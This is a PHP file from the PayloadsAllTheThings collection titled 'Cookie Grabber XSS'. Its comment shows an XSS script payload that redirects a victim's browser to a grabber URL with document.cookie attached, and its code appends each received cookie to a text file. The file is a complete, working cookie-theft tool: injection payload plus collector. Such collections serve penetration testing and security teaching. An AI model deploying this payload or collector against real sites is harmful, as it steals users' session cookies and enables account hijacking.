PayloadsAllTheThings/XSS/Cookie Grabber XSS.php
2016-10-19 23:39:07 +07:00

11 lines
No EOL
260 B
PHP

<?php
// How to use it
# <script>document.location='http://localhost/XSS/grabber.php?c=' + document.cookie</script>
// Write the cookie in a file
$cookie = $_GET['c'];
$fp = fopen('cookies.txt', 'a+');
fwrite($fp, 'Cookie:' .$cookie.'\r\n');
fclose($fp);
?>